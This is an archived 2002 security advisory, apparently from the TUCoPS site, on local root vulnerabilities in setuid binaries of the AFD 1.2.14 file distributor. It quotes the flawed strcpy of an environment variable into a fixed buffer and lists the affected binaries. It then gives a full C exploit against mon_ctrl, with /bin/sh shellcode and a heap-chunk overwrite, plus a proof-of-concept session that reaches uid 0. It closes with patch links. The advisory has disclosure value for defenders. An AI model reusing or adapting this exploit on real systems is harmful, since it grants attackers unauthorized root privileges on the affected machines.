Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: unix5677.htm

AFD mutiple local root exploits via stack and heap overflows



9th Sep 2002 [SBWID-5677]
COMMAND

	
		AFD multiple local root exploits via stack and heap overflows
	
	

SYSTEMS AFFECTED

	
		this  vulnerability  was  discovered  in  the  AFD  1.2.14  package  but
		previous versions are probably vulnerable too.
		

			version				vulnerable		exploitable

		

			* Linux 1.3.x  -  2.4.x		YES			YES

			* Solaris 2.x			probably (not tested)	probably (not tested)

			* HP-UX 10.x  -  11.x		probably (not tested)	probably (not tested)

			* IRIX 5.3  6.x			probably (not tested)	probably (not tested)

			* AIX 4.3			probably (not tested)	probably (not tested)

			* FTX 3.0.x  3.2.x		probably (not tested)	probably (not tested)

			* SCO OpenServer Release 5	probably (not tested)	probably (not tested)

		
	
	

PROBLEM

	
		In Netric Security Team - http://www.netric.[org|be] advisory by  Netric
		:
		

		 Description

		

		The Automatic File Distributor provides a framework for  very  flexible,
		non-stop, log and debug-able delivery of an arbitrary  amount  of  files
		to multiple recipients as expressed in URLs.
		

		The AFD package  comes  with  a  few  sources  that  once  compiled  and
		installed are set uid root by default.
		

		amough  other  vulnerabilities,  in  the  beginning  of  most  of  these
		programs a directory is needed. it can be supplied with a  command  line
		switch (-w) or an environ variable. the exploitable code for most  looks
		like :
		

			#define MON_WD_ENV_NAME          "MON_WORK_DIR"  /* Environment variable */

			#define WD_ENV_NAME              "AFD_WORK_DIR"  /* The working dir-   */

			...

			/* work_dir is global in some sources, local in other sources */

			char  work_dir[MAX_PATH_LENGTH];

			...

		

			int

			main(int argc, char *argv[])

			{

				...

				/* work_dir is global in some sources, local in other sources */

				char  work_dir[MAX_PATH_LENGTH];

				...

				/* might call some other function that then calls this function */

				if (get_XXX_path(&argc, argv, work_dir) < 0)

				{

					exit(INCORRECT);

				}

				...

			}

		

			/* the XXX is either 'mon' or 'afd' */

			/* this function is in another file then main() is */

			get_XXX_path(int *argc, char *argv[], char *work_dir)

			{

				...

				char *ptr;

		

				/* Check if the environment variable is set */

				/* if ((ptr = getenv(MON_WD_ENV_NAME)) != NULL) <-- can also be this */

				if ((ptr = getenv(WD_ENV_NAME)) != NULL)

				{

					/* !!!!! THIS IS WHERE ALL THE ACTION TAKES PLACE !!!!! */

					(void)strcpy(work_dir, ptr);

				}

				...

			}

		

		as you can see the buffer work_dir gets overflowed, and a stack or  heap
		overflow occurs (depends if work_dir is global or local). With  some  of
		the binarys it's possible to cause the same overflow  with  the  command
		line switch -w, but in other binarys that length gets checked.
		

		the following is a listing of the vulnerable suid binarys, and  if  they
		are exploitable with the environ varibles and/or  the  -w  command  line
		switch :
		

		        name		-w switch		env. var

			afd		NO			YES

			afdcmd		NO			YES

			afd_ctrl	NO			YES

			init_afd	NO			YES

			mafd		YES			YES

			mon_ctrl	YES			YES

			show_olog	NO			YES

			udc		NO			YES

		

		

		 Exploit

		

		The following exploit was tested in a lab and  will  probably  not  work
		without any tweaking. it was tested agains mon_ctrl in  the  AFD  1.2.14
		package on redhat 7.3.
		

		/* AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)

		 * (Bug found by Sacrine (sacrine@netric.org)

		 * -----------------------------------------------------------------

		 * usage: ./afd-expl [retloc] [ret]

		 * 

		 * This exploit overwrites a saved return address on the stack,

		 * so that 0xbfffe360, (that worked for me on Redhat 7.3) will

		 * probally not work for you...

		 * 

		 * Just open the coredump, search the stack for 0x4207ac24, 

		 * and substract that address with 0x0c.

		 */

		

		#include <stdio.h>

		#include <stdlib.h>

		#include <string.h>

		

		char shellcode[] = 

		        "\xeb\x0a" /* 10-byte-jump; setreuid(0,0); execve /bin/sh; exit(0); */

		        "--netric--"

		        "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f"

		        "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d"

		        "\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

		

		

		int

		main(int argc, char *argv[])

		{

			char buffer[1135];

		

			unsigned int retloc     = 0xbfffe360;

			unsigned int ret        = 0x0806f020; /* &shellcode */

		

			if (argc > 1) retloc	= strtoul(argv[1], &argv[1], 16);

			if (argc > 2) ret	= strtoul(argv[2], &argv[2], 16);

		

			memset(buffer, 0x41, sizeof(buffer));

			memcpy(buffer, "MON_WORK_DIR=",13);

			memcpy(buffer+13, shellcode, strlen(shellcode));

		

			buffer[1117] = 0xff; /* prev_size */

			buffer[1118] = 0xff;

			buffer[1119] = 0xff;

			buffer[1120] = 0xff;

		

			buffer[1121] = 0xfc; /* size field */

			buffer[1122] = 0xff;

			buffer[1123] = 0xff;

			buffer[1124] = 0xff;

		

			buffer[1126] = (retloc & 0x000000ff); /* FD */

			buffer[1127] = (retloc & 0x0000ff00) >> 8;

			buffer[1128] = (retloc & 0x00ff0000) >> 16;

			buffer[1129] = (retloc & 0xff000000) >> 24;

		

			buffer[1130] = (ret & 0x000000ff); /* BK */

			buffer[1131] = (ret & 0x0000ff00) >> 8;

			buffer[1132] = (ret & 0x00ff0000) >> 16;

			buffer[1133] = (ret & 0xff000000) >> 24;

		

			buffer[1134] = 0x0;

			putenv(buffer);

		

			fprintf(stdout, "AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)\n");

			fprintf(stdout, "-----------------------------------------------------------------\n");

			fprintf(stdout, "Ret    = 0x%08x\n", ret);

			fprintf(stdout, "Retloc = 0x%08x\n", retloc);

		

			execl("/bin/mon_ctrl", "mon_ctrl", NULL);

			return 0;

		}

		

		

		 Proof of concept

		

			[eSDee@/ bin]$ id

			uid=502(eSDee) gid=500(trusted) groups=500(trusted)

			[eSDee@/ bin]$ ./afd-expl

			AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)

			-----------------------------------------------------------------

			Ret    = 0x0806f020

			Retloc = 0xbfffe360

			28 17:32:12 <E> Failed to create directory <Ű

			--netric--1█1╔¸Ń░F═Shn/shh//biŃRSß░

			                                  ═AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

							  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

							  AAAAAAAAAAAAAAAAAAAAAAAAA

			....

			ectory (check_dir.c 66)

			sh-2.05a# id

			uid=0(root) gid=500(trusted) groups=500(trusted)

			sh-2.05a# exit

		
	
	

SOLUTION

	
		There is a new version released of afd (1.2.15) which can be  downloaded
		from :
		

		 [source]  ftp://ftp.dwd.de/pub/afd/src-1.2.15.tar.bz2

		 [rpm   ]  ftp://ftp.dwd.de/pub/afd/rpm/afd-1.2.15-2.i386.rpm

		

		there is also a patch released for version 1.2.14 which can be found  on
		:
		

		 [patch ]  ftp://ftp.dwd.de/pub/afd/patch-1.2.15.bz2

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH